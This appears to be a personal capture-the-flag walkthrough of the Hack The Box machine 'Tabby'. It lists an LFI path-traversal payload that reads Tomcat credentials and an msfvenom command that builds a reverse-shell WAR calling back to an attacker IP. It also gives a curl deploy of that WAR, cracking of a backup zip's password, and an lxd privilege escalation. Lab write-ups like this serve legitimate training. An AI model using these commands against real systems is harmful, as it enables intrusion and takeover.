initial foothold
___________________

port 8080 -->> news -->> LFI
LFI payload -->> view-source -->> /news.php?file=../../../../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
	tomcat : $3cureP4s5w0rd123!
authenticating into web portal @ /host-manager/html (ssh not working) -->> success!!
tomcat supports .war file uploads -->> creating war payload using msfvenom
	msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f war > payload.war
using follwoing command to upload, as mentioned in documentation (https://gist.github.com/pete911/6111816):
	curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file /root/Desktop/htb/htb-machines/htb-tabby/payload.war "http://10.10.10.194:8080/manager/text/deploy?path=/payload.war"
from browser calling payload.war -->> netcat shell as tomcat
_______________
user access
_______________

find / -user ash -->> /var/www/html/files/ -->> a backup file -->> downloading it on local machine
requires password to unzip -->> using fcrackzip
	fcrackzip -D -p  /usr/share/wordlists/rockyou.txt 16162020_backup.zip 
password found admin@it -->> user.txt
	ash : admin@it
___________
priv esc
___________
id -->> shows unusual lxd group (https://www.hackingarticles.in/lxd-privilege-escalation/)
follow steps in article -->> cd /mnt/root/root -->> root.txt
